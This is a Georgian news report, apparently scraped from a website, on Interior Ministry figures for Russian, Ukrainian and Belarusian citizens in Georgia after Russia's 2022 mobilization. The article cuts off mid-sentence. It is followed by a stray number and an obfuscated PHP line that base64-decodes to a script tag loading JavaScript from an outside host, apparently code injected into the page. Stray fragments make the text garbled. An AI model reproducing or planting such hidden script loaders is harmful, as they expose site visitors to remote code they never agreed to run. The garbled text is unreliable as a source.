celsiusi
ავერსი საქკაბელი
შინაგან საქმეთა სამინისტროს 3 ოქტომბრის სტატისტიკით, საქართველოს ტერიტორიაზე რუსეთის 112 733 მოქალაქე იმყოფება. ასე უპასუხა უწყებამ პარლამენტის წევრ ლევან ქარუმიძეს დადეპუტატო კითხვის ფორმატში.
 
ამავე პერიოდში საქართველოს ტერიტორიაზე იმყოფება უკრაინის 25 779 და ბელორუსის 13 151 მოქალაქე. შსს-ს თანახმად, სტატისტიკური მონაცემები იანვარ-სექტემბრის პერიოდს ეფუძნება. კერძოდ, ეს ადამიანები 2022 წლის იანვრიდან 30 სექტემბრის პერიოდში შემოვიდნენ ქვეყანაში და 3 ოქტომბრის მდგომარეობით საქართველოში იმყოფებოდნენ. 
 
 
უკრაინაში რუსეთის მიერ დაწყებული საომარი მოქმედებების შემდეგ საქართველოში მიგრაციის მაჩვენებელი გაზრდილია, მათ შორის მას შემდეგ, რაც რუსეთის პრეზიდენტმა მობილიზაცია გამოაცხადა. რუსეთმა ნაწილობრივი მობილიზაცია 21 სექტემბერს გამოაცხადა. ქვეყნის თავდაცვის მინისტრის, სერგეი შოიგუს განცხადებით, ნაწილობრივი მობილიზაციის ფარგლებში 300 000 რეზერვისტს გამოიძახებდნენ. პუტინმა მობილიზაციის რეჟიმის გაუქმების შესახებ უკვე 
377
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");